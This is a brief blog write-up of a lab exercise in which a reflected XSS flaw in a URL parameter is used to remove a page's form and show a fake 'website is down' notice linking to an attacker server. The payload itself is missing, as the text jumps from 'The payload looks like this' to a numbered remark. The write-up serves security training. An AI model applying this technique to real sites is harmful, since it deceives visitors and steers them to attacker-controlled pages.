XSS - Social Engineering: JS for Pentesters task 5 write up
writeup for task-5 of JS for pentesters series by security-tube - Social Engineering
We have already seen some good challenges from Pentester Academy like Hijacking Form submit and adding a new form element etc… This challenge is a bit more exciting one than the ones we solved till now. Let us try a Social Engineering technique with XSS.
JS for Pentesters task 5
Our objective of this challenge is to Remove the Form and add a notification “Website is Down! Please visit SecurityTube.net”. Now let us see how can we solve this:
As always, you can see that there is an XSS vulnerability via the URL parameter. The first thing we should do is to remove the form. For that, we can select the Form we need to remove first and then add a notification at the same place saying that the particular website is down with a link to the attacker server. The payload looks like this:
2) The solutions written above is the way we cracked the problem which might be different from the solution videos provided by the SecurityTube. If you need the solution video, you have to subscribe to PentesterAcademy.
We hope that you really liked this challenge. If there is anything you didn’t understand or wanted to get more clarity, please comment down and we are more than happy to help. Also, if you get a better way of solving the challenge, please share it with us and we are happy to learn from our readers too. Happy pentesting..